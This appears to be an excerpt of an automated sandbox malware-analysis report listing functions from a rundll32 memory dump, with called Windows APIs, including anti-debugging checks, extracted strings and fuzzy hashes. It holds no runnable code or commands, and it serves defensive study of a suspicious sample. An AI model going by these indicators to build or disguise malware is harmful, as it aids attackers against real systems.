                      • Opcode Fuzzy Hash: 9ec5509ec293f19a259fbaf35df23025227bdf422f98f6edbc8c5674f992334c
                      • Instruction Fuzzy Hash: 1A729C7A904268DFDB04CFAAC590BADBFF5FF98311F28815AE409A7245D7349990CF60
                      Function 7F3594FF Relevance: 6.7, APIs: 1, Strings: 3, Instructions: 719COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$Failedtogetpointer$tFailedtoaddbootent
                      • API String ID: 0-2555035225
                      • Opcode ID: 07701e02ef1104ed3487738931c107b662cf595e93a7f0e5727fe3df3a98b620
                      • Instruction ID: 68ec7cb65e0b435115b29d2ad63dc7731f39b386282530d27d7dcaa38ec6d620
                      • Opcode Fuzzy Hash: 07701e02ef1104ed3487738931c107b662cf595e93a7f0e5727fe3df3a98b620
                      • Instruction Fuzzy Hash: 6C726C75D05268DFDB14CFAAC990BADBFF1FB88314F28819AD409AB245D7349990CF60
                      Function 7F35DC1C Relevance: 6.7, APIs: 1, Strings: 3, Instructions: 679COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$Windows::Compat::A$tFailedtoaddbootent
                      • API String ID: 0-1618564604
                      • Opcode ID: 4ed8b41917472461b57b073eb70c4f89b4ebc4315db807063e7544cf84bf15cf
                      • Instruction ID: 8abf25ca3845cf367db3a9523738e7bddd2f240812fdee77f86b142006fe887b
                      • Opcode Fuzzy Hash: 4ed8b41917472461b57b073eb70c4f89b4ebc4315db807063e7544cf84bf15cf
                      • Instruction Fuzzy Hash: 24629E7A904268DFCB14CF6AC990BADBFF5FF98311F28815AE409A7245D7349990CF60
                      Function 7F3E53AC Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 83a57bf85b6e3fabb990bf279b75838dde3aa46b279f782c0b99ad87c531a9a7
                      • Instruction ID: 8f9c527b2baf0347f9836e28933c5737b23de4b8276e24025b730d5aeedce879
                      • Opcode Fuzzy Hash: 83a57bf85b6e3fabb990bf279b75838dde3aa46b279f782c0b99ad87c531a9a7
                      • Instruction Fuzzy Hash: 4CB139769053659FDB46CF68C8817EEBBB6EF55310F14816BE806EB281D634E901CBA0
                      Function 7F3D18C7 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                      Download Yara Rule
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7F3D18D3
                      • IsDebuggerPresent.KERNEL32 ref: 7F3D199F
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7F3D19B8
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 7F3D19C2
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: 4a53c5d81a857f9294a74901683ed8a7765988f809d48199a98806a8c7d48347
                      • Instruction ID: b87fbd9e3cb40dd42ef33f082c5b372fea66eebee0ed9b6f000632ab98ed83ce
                      • Opcode Fuzzy Hash: 4a53c5d81a857f9294a74901683ed8a7765988f809d48199a98806a8c7d48347
                      • Instruction Fuzzy Hash: C2310675D01319DBDB21EFA1C9497CDBBB8AF08314F1041AAE40DAB240E7719A85CF85
                      Function 7F365C4E Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 628COMMON
                      Download Yara Rule
                      APIs
                      • IsValidCodePage.KERNEL32(?), ref: 7F365D80
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CodePageValid
                      • String ID: 4A$tFailedtoaddbootent
                      • API String ID: 1911128615-684839989
                      • Opcode ID: 1c679d47bb0887de9db1bb513c0648b0ef333902dc9c6f94f7934ebaceae3aba
                      • Instruction ID: 39cc3e0fb51a0d35f9fb9d89d8642b0eac383b1e1f6a76118fabf323f11edc33
                      • Opcode Fuzzy Hash: 1c679d47bb0887de9db1bb513c0648b0ef333902dc9c6f94f7934ebaceae3aba
                      • Instruction Fuzzy Hash: FB52C17A904268DFDB04CFAAC9907AEBFF1FF58325F28815AE445A7245D3349990CF20
                      Function 7F36B32B Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 563COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: ActiveWindow
                      • String ID: 4A$tFailedtoaddbootent
                      • API String ID: 2558294473-684839989
                      • Opcode ID: 97ae5eb2ff1ead59ef9f9f3bce0c4def0fd5a57290f2ad554edacb4ccba35472
                      • Instruction ID: 35c918881f9b7fe20c3075e248c99233e03cd516ff02cd91522c6e2d071ca5f9
                      • Opcode Fuzzy Hash: 97ae5eb2ff1ead59ef9f9f3bce0c4def0fd5a57290f2ad554edacb4ccba35472
                      • Instruction Fuzzy Hash: 42428DB9D04268CFDB14CF6AC8907ADBFB5FB48315F28819ED449A7249D7349A90CF60
                      Function 7F35A696 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 353COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$tFailedtoaddbootent
                      • API String ID: 0-684839989
                      • Opcode ID: a2457030faa804d1a197db626bf7cc47bfd6046c65ccda0979f6b72d5e3cd44b
                      • Instruction ID: bc7b707d92efbb03ee418cb1f24757ae3d3872547492bd5d750d1d4e6f0dd294
                      • Opcode Fuzzy Hash: a2457030faa804d1a197db626bf7cc47bfd6046c65ccda0979f6b72d5e3cd44b
                      • Instruction Fuzzy Hash: 19F17C7A904224DFDB08CF7AC590BADBFB2FB88321F28815ED459A7245D7349991CF60
                      Function 7F35A9E3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON
                      Download Yara Rule
                      APIs
                      • IsValidCodePage.KERNEL32(00000001), ref: 7F35ACDD
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CodePageValid
                      • String ID: 4A$tFailedtoaddbootent
                      • API String ID: 1911128615-684839989
                      • Opcode ID: 6b19cd30493b08c801cbc93493365cfd7b9c421b4b56df78cd6c4fc3e29c69de
                      • Instruction ID: 9c39391b3925796dfdc41a48915c1bd98675a3f16b7510ae725876de6dd731e4
                      • Opcode Fuzzy Hash: 6b19cd30493b08c801cbc93493365cfd7b9c421b4b56df78cd6c4fc3e29c69de
                      • Instruction Fuzzy Hash: 3ED19E7A904224DFDB08CFBAC594BADBFB2FB88321F28815EE455A7245D7349950CF60
                      Function 7F37BC30 Relevance: 5.4, Strings: 4, Instructions: 363COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: FkkhdfsbObfw$U$k$s
                      • API String ID: 0-2251587115
                      • Opcode ID: c61feec62eb6dbab8053ed8a023ad6fb5605e5a40d5446d4441446fe03573eb0
                      • Instruction ID: fa9215df24038cc0ab8da48cc00b42a9d48eb27d0c9cfc5a9a1fcbe78b4cb90c
                      • Opcode Fuzzy Hash: c61feec62eb6dbab8053ed8a023ad6fb5605e5a40d5446d4441446fe03573eb0
                      • Instruction Fuzzy Hash: 8212AE74E04269CFDB15CFA8C890BDDBBB2BF59304F10819AD849AB345D735AA85CF60
                      Function 7F3D5753 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 7F3D584B
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 7F3D5855
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 7F3D5862
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: 9528eda62580abecf2f5f5206d8935e0950c1ea76ab3c5c5d18cfd98a9002157
                      • Instruction ID: 955ab2f9dcac3afdd12ccdda72cf87059453a520b4132c6928f5c3a8b6ef9ee1
                      • Opcode Fuzzy Hash: 9528eda62580abecf2f5f5206d8935e0950c1ea76ab3c5c5d18cfd98a9002157
                      • Instruction Fuzzy Hash: B831B375911329ABCB61DF65D8887CDBBB8FF08310F5042EAE41DA7290E7709B858F45
                      Function 7F369790 Relevance: 4.3, Strings: 3, Instructions: 553COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: @$@$PE
                      • API String ID: 0-2458287169
                      • Opcode ID: 06a48955329d2b32ae25aad3558f150aa60afa053dc89980c133249c2b7e3ce9
                      • Instruction ID: 95ee9c79e744e96d8c5b14988cbba96fa6b2108acf1c6687554f1757a724bea8
                      • Opcode Fuzzy Hash: 06a48955329d2b32ae25aad3558f150aa60afa053dc89980c133249c2b7e3ce9
                      • Instruction Fuzzy Hash: D6528F74E05229DBDB64CF98C990BDDBBB6BF49304F1081EAD809AB345D731AA85CF50
                      Function 7F36CD55 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 593COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: '-.
                      • API String ID: 0-1971626124
                      • Opcode ID: da556b2205a21a317281a3f171282f62f1ef8b8ef14de75b1fb9e9b25938a12d
                      • Instruction ID: 7613575a675857c14c57c34710ac0bd75a790d8212062a2d5a046c8003e4f50f
                      • Opcode Fuzzy Hash: da556b2205a21a317281a3f171282f62f1ef8b8ef14de75b1fb9e9b25938a12d
                      • Instruction Fuzzy Hash: 2C42C37AD08264DBDB14CF6AC8907ADBFF6FB48325F28815ED449A7249D3349991CF20
                      Function 7F3D8940 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a2e1c1015427ae056df9ca73f936035581a12ebffbe6b04ad3e515bee05b50be
                      • Instruction ID: de5620a11340104b6831ff0ff503ebd4b3fe85e1a16cbb34740804168b49f245
                      • Opcode Fuzzy Hash: a2e1c1015427ae056df9ca73f936035581a12ebffbe6b04ad3e515bee05b50be
                      • Instruction Fuzzy Hash: F5F13172E01219DFDB15CFA8C980A9DF7B2FF88314F158269E916AB394D730B945CB90
                      Function 7F372A3F Relevance: 3.3, Strings: 2, Instructions: 752COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$tFailedtoaddbootent
                      • API String ID: 0-684839989
                      • Opcode ID: fd4cfca644cafb02e387ef02db837f0e304b4a02d751f8c5e2fbc5d1eb8fdd0b
                      • Instruction ID: ed637856178a3558ed278715fa8251c0a796ebbedcc6605b7404b0f85a70fa30
                      • Opcode Fuzzy Hash: fd4cfca644cafb02e387ef02db837f0e304b4a02d751f8c5e2fbc5d1eb8fdd0b
                      • Instruction Fuzzy Hash: CD7270B6905264DFDB14CF6AC8907ADBFF5FF48310F288199E449A7245DB389A90CF60
                      Function 7F372CBF Relevance: 3.2, Strings: 2, Instructions: 689COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$tFailedtoaddbootent
                      • API String ID: 0-684839989
                      • Opcode ID: 1126b41081098cf05246899f89934b5bea7fa08a9a3828411a6de40852a3d50b
                      • Instruction ID: 157de86235b1e5449d86af0252877c4c2195ba558b54d6377ccdc39a19bd4226
                      • Opcode Fuzzy Hash: 1126b41081098cf05246899f89934b5bea7fa08a9a3828411a6de40852a3d50b
                      • Instruction Fuzzy Hash: CF625D76904268DFDB14CFAAC8907AEBFF5FF48311F288199E449A7245D7389990CF60
                      Function 7F3E6967 Relevance: 3.1, APIs: 2, Instructions: 55COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,7F3DF125,?,Microsoft Visual C++ Runtime Library,00012012,?,00000240,?,?,7F33B8DF,?,?,00000000,00000480), ref: 7F3E68F0
                      • OutputDebugStringW.KERNEL32(00003C16,?,7F3DF125,?,Microsoft Visual C++ Runtime Library,00012012,?,00000240,?,?,7F33B8DF,?,?,00000000,00000480), ref: 7F3E6907
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: DebugDebuggerOutputPresentString
                      • String ID:
                      • API String ID: 4086329628-0
                      • Opcode ID: fa2fae02f4dd460d3440087fa092ec7f678ea4143af581a3c7d1d292ac42af1d
                      • Instruction ID: fc7f2da1f4d41df012925ddb5a846feedc1a0729f358bc14d30a2788b86cfebc
                      • Opcode Fuzzy Hash: fa2fae02f4dd460d3440087fa092ec7f678ea4143af581a3c7d1d292ac42af1d
                      • Instruction Fuzzy Hash: 3101A23612433AFBEF111A719C44FAE3B6DDF55271F240005FD55DA140CA21E822D3B5
                      Function 7F3678CD Relevance: 2.9, Strings: 2, Instructions: 414COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$tFailedtoaddbootent
                      • API String ID: 0-684839989
                      • Opcode ID: fffa781b78b8a581f5499ea0b894abac47af0a044ebbac4b40d659b50e312fdd
                      • Instruction ID: f05f30146f3c6c228e28e36e0605c120289a3b92b96a9d910f6f60481e02632b
                      • Opcode Fuzzy Hash: fffa781b78b8a581f5499ea0b894abac47af0a044ebbac4b40d659b50e312fdd
                      • Instruction Fuzzy Hash: EF12C17A904264DFDB04CFAAC8907BEBFF5EB99321F28815AE444A7245D7348951CF70
                      Function 7F36ED68 Relevance: 2.0, Strings: 1, Instructions: 765COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A
                      • API String ID: 0-1298712752
                      • Opcode ID: 15813c2f34c6109adccb411b97c98ad3788e7a1e9bdf31f65d214eaec28be9a7
                      • Instruction ID: 51136a68b9e05d3bb20fdec3bb72fb42b33f810540f2facc991dbbb9b54eeca0
                      • Opcode Fuzzy Hash: 15813c2f34c6109adccb411b97c98ad3788e7a1e9bdf31f65d214eaec28be9a7
                      • Instruction Fuzzy Hash: B472A17A904224DBDB04CFAAC8907ADBFF1FF58320F28815AD449A7359E7349990CF64
                      Function 7F3AD5B0 Relevance: 2.0, Strings: 1, Instructions: 765COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID: 0-3916222277
                      • Opcode ID: 46380ddb8ee1d26ef71a4d46c062c788a5b80e56f9ddb9fc0b191344ef0557d2
                      • Instruction ID: a4e2c5c6d28b944e64162fc105c79ad65cfc826375d3ca5ed8bed96755a9ecfa
                      • Opcode Fuzzy Hash: 46380ddb8ee1d26ef71a4d46c062c788a5b80e56f9ddb9fc0b191344ef0557d2
                      • Instruction Fuzzy Hash: EEA2AD78E052698FCB68CF59C894BDDBBB1BF89304F1082DAD849A7355D731AA81CF50
                      Function 7F36CDD8 Relevance: 1.8, APIs: 1, Instructions: 538COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d8af5aded068c9ebb3523ce6279081d1529748efb3e4e8c89591493b6b53d72f
                      • Instruction ID: 1b946cd78b95593915cf8731a823d7cb3f68a25d1793c7e1c5f7e8e0f421bc57
                      • Opcode Fuzzy Hash: d8af5aded068c9ebb3523ce6279081d1529748efb3e4e8c89591493b6b53d72f
                      • Instruction Fuzzy Hash: 5732D47A904264DFDB14CF6AC8907ADBFF1FB48321F28815EE449A7249D73499A1CF20
                      Function 7F3E1ABD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,7F3E1AB8,?,?,00000008,?,?,7F3F0FF5,00000000), ref: 7F3E1CEA
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: 240e166040ce4b606586c7e46c252ea2ffbc28e03bef88520a3654bbdb2acf11
                      • Instruction ID: d72d23d802461dad9cb767ef926b6bcc567ea2c5010c52a49d26149a82f4dd9b
                      • Opcode Fuzzy Hash: 240e166040ce4b606586c7e46c252ea2ffbc28e03bef88520a3654bbdb2acf11
                      • Instruction Fuzzy Hash: 87B15736610619CFDB05DF28C486BA57BF5FF45364F258698E89ACF2A1C335E982CB40
                      Function 7F3AA730 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aullrem
                      • String ID: N/A
                      • API String ID: 3758378126-2525114547
                      • Opcode ID: 975738c8d015446b7bfbfcb8339a3c2be174488aa8bdcf743e5e9a85f90fc10d
                      • Instruction ID: c0cebb8a7b9bae356437001ba83abb8b8cd3eb6d79c7fa7c42e0540796aa623e
                      • Opcode Fuzzy Hash: 975738c8d015446b7bfbfcb8339a3c2be174488aa8bdcf743e5e9a85f90fc10d
                      • Instruction Fuzzy Hash: BA528C74E05268CFDB69CFA9C890BDDBBB1BF49304F10819AD859AB345D731AA81CF50
                      Function 7F3DDDCB Relevance: 1.6, Strings: 1, Instructions: 388COMMONLIBRARYCODE
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: dffd318cd33bac52bb7a5955d29b02c2543d876fa42aeb481584939beaf68b7a
                      • Instruction ID: 8eed5fdbc3dcab44336c959a7b85c311af0243c83809aa1aae526c7244b344c3
                      • Opcode Fuzzy Hash: dffd318cd33bac52bb7a5955d29b02c2543d876fa42aeb481584939beaf68b7a
                      • Instruction Fuzzy Hash: A7E19A76A007058FCB1ACF68C580AAEBBBAFF59314B10465DF4579B390D730B986CB52
                      Function 7F36DA03 Relevance: 1.6, APIs: 1, Instructions: 344COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b80c9ad9bc770450be8e837ae14818c266d46cfa59f8b52686058e341fd4a9dc
                      • Instruction ID: cad05756f795884436bd38229b8dd2c445620d3c64c7352e803a53ee67cf20e9
                      • Opcode Fuzzy Hash: b80c9ad9bc770450be8e837ae14818c266d46cfa59f8b52686058e341fd4a9dc
                      • Instruction Fuzzy Hash: 13F1BE7A908264DFDB04CFAAC4907ADBFF2FF48311F28815AE449A7249D7349990CF25
                      Function 7F3DD6D8 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 65819fd92813ef7ffbd528b43f583041069d1899edb9a0e0260bc55058bfb3a3
                      • Instruction ID: fe7bce1a28bff3e95734b6890c9f133ceea572ca758462fb9c722a23f39f1b27
                      • Opcode Fuzzy Hash: 65819fd92813ef7ffbd528b43f583041069d1899edb9a0e0260bc55058bfb3a3
                      • Instruction Fuzzy Hash: 00C1CD76A007068FCB16CE64C490AAEBBB6FF05314F10469DF4979B791C731B946CB91
                      Function 7F3DDA66 Relevance: 1.6, Strings: 1, Instructions: 322COMMONLIBRARYCODE
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: f5f4bb07e5c467939ab6815a8e74719c1b4388ca1391489f5107b0040652db19
                      • Instruction ID: bf05ee74059d2178c88757b57352f745a735a0ec9724060ce6aa40c87dcbfd3e
                      • Opcode Fuzzy Hash: f5f4bb07e5c467939ab6815a8e74719c1b4388ca1391489f5107b0040652db19
                      • Instruction Fuzzy Hash: 8FB1D376A0070A9FCB29CFA8C5806AEB7F6FF44214F104A1DF457AB690D770B946CB51
                      Function 7F3EAA89 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • EnumSystemLocalesW.KERNEL32(7F3EABAF,00000001,00000000,?,-00000050,?,7F3EB1E0,00000000,?,?,?,00000055,?), ref: 7F3EAAFB
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnumLocalesSystem
                      • String ID:
                      • API String ID: 2099609381-0
                      • Opcode ID: f0171a7f2fd6cc65b897057886b7b7a3725b8ea1b8b55b8de04c2a3b12ee5ae7
                      • Instruction ID: cd7a83b48fdbe8de54fad39be448bfff4bf8bcf9e0826ddd76ac4e0f2ffe3237
                      • Opcode Fuzzy Hash: f0171a7f2fd6cc65b897057886b7b7a3725b8ea1b8b55b8de04c2a3b12ee5ae7
                      • Instruction Fuzzy Hash: 2511E93B2007115FDB089F39C8915AAB7A3FF84369B18452DE9578BA40E771B543CB40
                      Function 7F3EAB24 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • EnumSystemLocalesW.KERNEL32(7F3EAE02,00000001,00000001,?,-00000050,?,7F3EB1A4,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 7F3EAB6E
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnumLocalesSystem
                      • String ID:
                      • API String ID: 2099609381-0
                      • Opcode ID: 389b49205d8736a89e6a1443c582aa0b6706b200b1122cfaa634e1860261a279
                      • Instruction ID: bca3d9357d39f9e76ac2406a7275d7b0bda6c860a9c4338a8024a0bffa8671c6
                      • Opcode Fuzzy Hash: 389b49205d8736a89e6a1443c582aa0b6706b200b1122cfaa634e1860261a279
                      • Instruction Fuzzy Hash: 20F0F0362003155FDB145F39C880AAA7BE6EF80368F15456DFE568F680C6B1AC02CB50
                      Function 7F3E42DF Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                        • Part of subcall function 7F3DF8E0: EnterCriticalSection.KERNEL32(-002B0D68,?,7F3E088A,00000000,7F4143A0,0000000C,7F3E0851,?,?,7F3E4071,?,?,7F3E253A,00000001,00000364,7F334A48), ref: 7F3DF8EF
                      • EnumSystemLocalesW.KERNEL32(7F3E42D2,00000001,7F414540,0000000C,7F3E4758,00000000), ref: 7F3E4317
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalEnterEnumLocalesSectionSystem
                      • String ID:
                      • API String ID: 1272433827-0
